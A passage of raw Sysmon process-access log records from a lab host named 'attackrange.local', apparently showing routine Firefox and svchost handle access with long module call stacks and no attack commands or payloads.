Files\Mozilla Firefox\xul.dll+f82f80|C:\Program Files\Mozilla Firefox\xul.dll+f845d3|C:\Program Files\Mozilla Firefox\xul.dll+a7a56f|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program 
Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+a8c121|C:\Program Files\Mozilla Firefox\xul.dll+5315462|C:\Program Files\Mozilla Firefox\xul.dll+126ae69|C:\Program Files\Mozilla Firefox\xul.dll+126cc24|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19ee53|C:\Program Files\Mozilla Firefox\xul.dll+1267370|C:\Program Files\Mozilla Firefox\xul.dll+19ea7a|C:\Program Files\Mozilla Firefox\xul.dll+53154b9 10341000x800000000000000016802Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.395{59A5CD1D-945A-6005-3305-00000000A301}70526276C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+f74b0e|C:\Program Files\Mozilla Firefox\xul.dll+1087037|C:\Program Files\Mozilla Firefox\xul.dll+11c4361|C:\Program Files\Mozilla Firefox\xul.dll+f82f80|C:\Program Files\Mozilla Firefox\xul.dll+f845d3|C:\Program Files\Mozilla Firefox\xul.dll+3b226|C:\Program Files\Mozilla Firefox\xul.dll+39bf2|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+a88d85|C:\Program Files\Mozilla Firefox\nss3.dll+12e8aa|C:\Program Files\Mozilla Firefox\nss3.dll+11f961|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016801Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.380{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla 
Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016800Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.380{59A5CD1D-8E46-6005-1600-00000000A301}15441576C:\Windows\system32\svchost.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016799Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.380{59A5CD1D-945A-6005-3305-00000000A301}70526288C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3dfbc7b|C:\Program Files\Mozilla Firefox\xul.dll+3dfcd3d|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000016798Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.364{59A5CD1D-8E46-6005-1100-00000000A301}11721848C:\Windows\system32\svchost.exe{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016797Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.364{59A5CD1D-8E46-6005-1100-00000000A301}11721848C:\Windows\system32\svchost.exe{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016796Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.364{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+2e63c78|C:\Program Files\Mozilla Firefox\xul.dll+172411e|C:\Program Files\Mozilla Firefox\xul.dll+2df7d26|C:\Program Files\Mozilla Firefox\xul.dll+2df693a|C:\Program Files\Mozilla Firefox\xul.dll+2ec95e7|C:\Program Files\Mozilla Firefox\xul.dll+2ed0ef0|C:\Program Files\Mozilla Firefox\xul.dll+2ecde71|C:\Program Files\Mozilla 
Firefox\xul.dll+2ecc384|C:\Program Files\Mozilla Firefox\xul.dll+2ec3074|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9174|UNKNOWN(FFFFF80184AEE8D8)|UNKNOWN(FFFFD3D9952B4998)|UNKNOWN(FFFFD3D9952A8B88)|UNKNOWN(FFFFD3D9952A880D)|UNKNOWN(FFFFF80184805E03)|C:\Windows\System32\win32u.dll+1764|C:\Windows\System32\USER32.dll+11baf|C:\Program Files\Mozilla Firefox\xul.dll+2e9d022 10341000x800000000000000016795Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.364{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+2e63c51|C:\Program Files\Mozilla Firefox\xul.dll+172411e|C:\Program Files\Mozilla Firefox\xul.dll+2df7d26|C:\Program Files\Mozilla Firefox\xul.dll+2df693a|C:\Program Files\Mozilla Firefox\xul.dll+2ec95e7|C:\Program Files\Mozilla Firefox\xul.dll+2ed0ef0|C:\Program Files\Mozilla Firefox\xul.dll+2ecde71|C:\Program Files\Mozilla Firefox\xul.dll+2ecc384|C:\Program Files\Mozilla Firefox\xul.dll+2ec3074|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9174|UNKNOWN(FFFFF80184AEE8D8)|UNKNOWN(FFFFD3D9952B4998)|UNKNOWN(FFFFD3D9952A8B88)|UNKNOWN(FFFFD3D9952A880D)|UNKNOWN(FFFFF80184805E03)|C:\Windows\System32\win32u.dll+1764|C:\Windows\System32\USER32.dll+11baf|C:\Program Files\Mozilla Firefox\xul.dll+2e9d022 10341000x800000000000000016794Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.364{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program 
Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+2e63c26|C:\Program Files\Mozilla Firefox\xul.dll+172411e|C:\Program Files\Mozilla Firefox\xul.dll+2df7d26|C:\Program Files\Mozilla Firefox\xul.dll+2df693a|C:\Program Files\Mozilla Firefox\xul.dll+2ec95e7|C:\Program Files\Mozilla Firefox\xul.dll+2ed0ef0|C:\Program Files\Mozilla Firefox\xul.dll+2ecde71|C:\Program Files\Mozilla Firefox\xul.dll+2ecc384|C:\Program Files\Mozilla Firefox\xul.dll+2ec3074|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9174|UNKNOWN(FFFFF80184AEE8D8)|UNKNOWN(FFFFD3D9952B4998)|UNKNOWN(FFFFD3D9952A8B88)|UNKNOWN(FFFFD3D9952A880D)|UNKNOWN(FFFFF80184805E03)|C:\Windows\System32\win32u.dll+1764|C:\Windows\System32\USER32.dll+11baf|C:\Program Files\Mozilla Firefox\xul.dll+2e9d022 10341000x800000000000000016793Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.349{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+1e796c|C:\Program Files\Mozilla Firefox\xul.dll+1e78bc|C:\Program Files\Mozilla Firefox\xul.dll+1010288|C:\Program Files\Mozilla Firefox\xul.dll+106d041|C:\Program Files\Mozilla Firefox\xul.dll+1724d76|C:\Program Files\Mozilla Firefox\xul.dll+2ba9867|C:\Program Files\Mozilla Firefox\xul.dll+2ba8a20|C:\Program Files\Mozilla Firefox\xul.dll+2bababe|C:\Program Files\Mozilla Firefox\xul.dll+1977d70|C:\Program Files\Mozilla Firefox\xul.dll+19710a8|C:\Program Files\Mozilla Firefox\xul.dll+4c9cc0|C:\Program Files\Mozilla 
Firefox\xul.dll+4c98d3|C:\Program Files\Mozilla Firefox\xul.dll+3167885|C:\Program Files\Mozilla Firefox\xul.dll+275d7f|C:\Program Files\Mozilla Firefox\xul.dll+2ca8e5|C:\Program Files\Mozilla Firefox\xul.dll+2cb9e5|C:\Program Files\Mozilla Firefox\xul.dll+19775e8|C:\Program Files\Mozilla Firefox\xul.dll+4c3e85|C:\Program Files\Mozilla Firefox\xul.dll+276006|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+275d7f 10341000x800000000000000016792Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.349{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+1e796c|C:\Program Files\Mozilla Firefox\xul.dll+1e78bc|C:\Program Files\Mozilla Firefox\xul.dll+1010288|C:\Program Files\Mozilla Firefox\xul.dll+106cf41|C:\Program Files\Mozilla Firefox\xul.dll+1724ba8|C:\Program Files\Mozilla Firefox\xul.dll+2ba9867|C:\Program Files\Mozilla Firefox\xul.dll+2ba8a20|C:\Program Files\Mozilla Firefox\xul.dll+2bababe|C:\Program Files\Mozilla Firefox\xul.dll+1977d70|C:\Program Files\Mozilla Firefox\xul.dll+19710a8|C:\Program Files\Mozilla Firefox\xul.dll+4c9cc0|C:\Program Files\Mozilla Firefox\xul.dll+4c98d3|C:\Program Files\Mozilla Firefox\xul.dll+3167885|C:\Program Files\Mozilla Firefox\xul.dll+275d7f|C:\Program Files\Mozilla Firefox\xul.dll+2ca8e5|C:\Program Files\Mozilla Firefox\xul.dll+2cb9e5|C:\Program Files\Mozilla Firefox\xul.dll+19775e8|C:\Program Files\Mozilla Firefox\xul.dll+4c3e85|C:\Program Files\Mozilla Firefox\xul.dll+276006|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+275d7f 
10341000x800000000000000016791Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.349{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+1e796c|C:\Program Files\Mozilla Firefox\xul.dll+1e78bc|C:\Program Files\Mozilla Firefox\xul.dll+1010288|C:\Program Files\Mozilla Firefox\xul.dll+106ce41|C:\Program Files\Mozilla Firefox\xul.dll+17249fe|C:\Program Files\Mozilla Firefox\xul.dll+2ba9867|C:\Program Files\Mozilla Firefox\xul.dll+2ba8a20|C:\Program Files\Mozilla Firefox\xul.dll+2bababe|C:\Program Files\Mozilla Firefox\xul.dll+1977d70|C:\Program Files\Mozilla Firefox\xul.dll+19710a8|C:\Program Files\Mozilla Firefox\xul.dll+4c9cc0|C:\Program Files\Mozilla Firefox\xul.dll+4c98d3|C:\Program Files\Mozilla Firefox\xul.dll+3167885|C:\Program Files\Mozilla Firefox\xul.dll+275d7f|C:\Program Files\Mozilla Firefox\xul.dll+2ca8e5|C:\Program Files\Mozilla Firefox\xul.dll+2cb9e5|C:\Program Files\Mozilla Firefox\xul.dll+19775e8|C:\Program Files\Mozilla Firefox\xul.dll+4c3e85|C:\Program Files\Mozilla Firefox\xul.dll+276006|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+275d7f 10341000x800000000000000016790Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.349{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+1e796c|C:\Program Files\Mozilla Firefox\xul.dll+1e78bc|C:\Program Files\Mozilla 
Firefox\xul.dll+1010288|C:\Program Files\Mozilla Firefox\xul.dll+106cd41|C:\Program Files\Mozilla Firefox\xul.dll+172484f|C:\Program Files\Mozilla Firefox\xul.dll+2ba9867|C:\Program Files\Mozilla Firefox\xul.dll+2ba8a20|C:\Program Files\Mozilla Firefox\xul.dll+2bababe|C:\Program Files\Mozilla Firefox\xul.dll+1977d70|C:\Program Files\Mozilla Firefox\xul.dll+19710a8|C:\Program Files\Mozilla Firefox\xul.dll+4c9cc0|C:\Program Files\Mozilla Firefox\xul.dll+4c98d3|C:\Program Files\Mozilla Firefox\xul.dll+3167885|C:\Program Files\Mozilla Firefox\xul.dll+275d7f|C:\Program Files\Mozilla Firefox\xul.dll+2ca8e5|C:\Program Files\Mozilla Firefox\xul.dll+2cb9e5|C:\Program Files\Mozilla Firefox\xul.dll+19775e8|C:\Program Files\Mozilla Firefox\xul.dll+4c3e85|C:\Program Files\Mozilla Firefox\xul.dll+276006|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+275d7f 10341000x800000000000000016789Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.349{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1216761|C:\Program Files\Mozilla Firefox\xul.dll+2bd81dd|C:\Program Files\Mozilla Firefox\xul.dll+2bd0ec9|C:\Program Files\Mozilla Firefox\xul.dll+2ba9755|C:\Program Files\Mozilla Firefox\xul.dll+2ba8a20|C:\Program Files\Mozilla Firefox\xul.dll+2bababe|C:\Program Files\Mozilla Firefox\xul.dll+1977d70|C:\Program Files\Mozilla Firefox\xul.dll+19710a8|C:\Program Files\Mozilla Firefox\xul.dll+4c9cc0|C:\Program Files\Mozilla Firefox\xul.dll+4c98d3|C:\Program Files\Mozilla Firefox\xul.dll+3167885|C:\Program Files\Mozilla Firefox\xul.dll+275d7f|C:\Program Files\Mozilla Firefox\xul.dll+2ca8e5|C:\Program Files\Mozilla Firefox\xul.dll+2cb9e5|C:\Program Files\Mozilla 
Firefox\xul.dll+19775e8|C:\Program Files\Mozilla Firefox\xul.dll+4c3e85|C:\Program Files\Mozilla Firefox\xul.dll+276006|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+275d7f|C:\Program Files\Mozilla Firefox\xul.dll+275993|C:\Program Files\Mozilla Firefox\xul.dll+4c069a|C:\Program Files\Mozilla Firefox\xul.dll+1bf9921 10341000x800000000000000016788Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.349{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2ba8a20|C:\Program Files\Mozilla Firefox\xul.dll+2bababe|C:\Program Files\Mozilla Firefox\xul.dll+1977d70|C:\Program Files\Mozilla Firefox\xul.dll+19710a8|C:\Program Files\Mozilla Firefox\xul.dll+4c9cc0|C:\Program Files\Mozilla Firefox\xul.dll+4c98d3|C:\Program Files\Mozilla Firefox\xul.dll+3167885|C:\Program Files\Mozilla Firefox\xul.dll+275d7f|C:\Program Files\Mozilla Firefox\xul.dll+2ca8e5|C:\Program Files\Mozilla Firefox\xul.dll+2cb9e5|C:\Program Files\Mozilla Firefox\xul.dll+19775e8|C:\Program Files\Mozilla Firefox\xul.dll+4c3e85|C:\Program Files\Mozilla Firefox\xul.dll+276006|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+275d7f 10341000x800000000000000016787Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.349{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla 
Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2ba8a20|C:\Program Files\Mozilla Firefox\xul.dll+2bababe|C:\Program Files\Mozilla Firefox\xul.dll+1977d70|C:\Program Files\Mozilla Firefox\xul.dll+19710a8|C:\Program Files\Mozilla Firefox\xul.dll+4c9cc0|C:\Program Files\Mozilla Firefox\xul.dll+4c98d3|C:\Program Files\Mozilla Firefox\xul.dll+3167885|C:\Program Files\Mozilla Firefox\xul.dll+275d7f|C:\Program Files\Mozilla Firefox\xul.dll+2ca8e5|C:\Program Files\Mozilla Firefox\xul.dll+2cb9e5|C:\Program Files\Mozilla Firefox\xul.dll+19775e8|C:\Program Files\Mozilla Firefox\xul.dll+4c3e85|C:\Program Files\Mozilla Firefox\xul.dll+276006|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+275d7f 10341000x800000000000000016786Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.349{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla 
Firefox\xul.dll+2ba8a20|C:\Program Files\Mozilla Firefox\xul.dll+2bababe|C:\Program Files\Mozilla Firefox\xul.dll+1977d70|C:\Program Files\Mozilla Firefox\xul.dll+19710a8|C:\Program Files\Mozilla Firefox\xul.dll+4c9cc0|C:\Program Files\Mozilla Firefox\xul.dll+4c98d3|C:\Program Files\Mozilla Firefox\xul.dll+3167885|C:\Program Files\Mozilla Firefox\xul.dll+275d7f|C:\Program Files\Mozilla Firefox\xul.dll+2ca8e5|C:\Program Files\Mozilla Firefox\xul.dll+2cb9e5|C:\Program Files\Mozilla Firefox\xul.dll+19775e8|C:\Program Files\Mozilla Firefox\xul.dll+4c3e85|C:\Program Files\Mozilla Firefox\xul.dll+276006|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+275d7f 10341000x800000000000000016785Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.349{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2ba8a20|C:\Program Files\Mozilla Firefox\xul.dll+2bababe|C:\Program Files\Mozilla Firefox\xul.dll+1977d70|C:\Program Files\Mozilla Firefox\xul.dll+19710a8|C:\Program Files\Mozilla Firefox\xul.dll+4c9cc0|C:\Program Files\Mozilla Firefox\xul.dll+4c98d3|C:\Program Files\Mozilla Firefox\xul.dll+3167885|C:\Program Files\Mozilla Firefox\xul.dll+275d7f|C:\Program Files\Mozilla Firefox\xul.dll+2ca8e5|C:\Program Files\Mozilla Firefox\xul.dll+2cb9e5|C:\Program Files\Mozilla Firefox\xul.dll+19775e8|C:\Program Files\Mozilla 
Firefox\xul.dll+4c3e85|C:\Program Files\Mozilla Firefox\xul.dll+276006|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+275d7f 10341000x800000000000000016784Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.349{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2ba8a20|C:\Program Files\Mozilla Firefox\xul.dll+2bababe|C:\Program Files\Mozilla Firefox\xul.dll+1977d70|C:\Program Files\Mozilla Firefox\xul.dll+19710a8|C:\Program Files\Mozilla Firefox\xul.dll+4c9cc0|C:\Program Files\Mozilla Firefox\xul.dll+4c98d3|C:\Program Files\Mozilla Firefox\xul.dll+3167885|C:\Program Files\Mozilla Firefox\xul.dll+275d7f|C:\Program Files\Mozilla Firefox\xul.dll+2ca8e5|C:\Program Files\Mozilla Firefox\xul.dll+2cb9e5|C:\Program Files\Mozilla Firefox\xul.dll+19775e8|C:\Program Files\Mozilla Firefox\xul.dll+4c3e85|C:\Program Files\Mozilla Firefox\xul.dll+276006|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+275d7f 10341000x800000000000000016783Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.349{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program 
Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2ba8a20|C:\Program Files\Mozilla Firefox\xul.dll+2bababe|C:\Program Files\Mozilla Firefox\xul.dll+1977d70|C:\Program Files\Mozilla Firefox\xul.dll+19710a8|C:\Program Files\Mozilla Firefox\xul.dll+4c9cc0|C:\Program Files\Mozilla Firefox\xul.dll+4c98d3|C:\Program Files\Mozilla Firefox\xul.dll+3167885|C:\Program Files\Mozilla Firefox\xul.dll+275d7f|C:\Program Files\Mozilla Firefox\xul.dll+2ca8e5|C:\Program Files\Mozilla Firefox\xul.dll+2cb9e5|C:\Program Files\Mozilla Firefox\xul.dll+19775e8|C:\Program Files\Mozilla 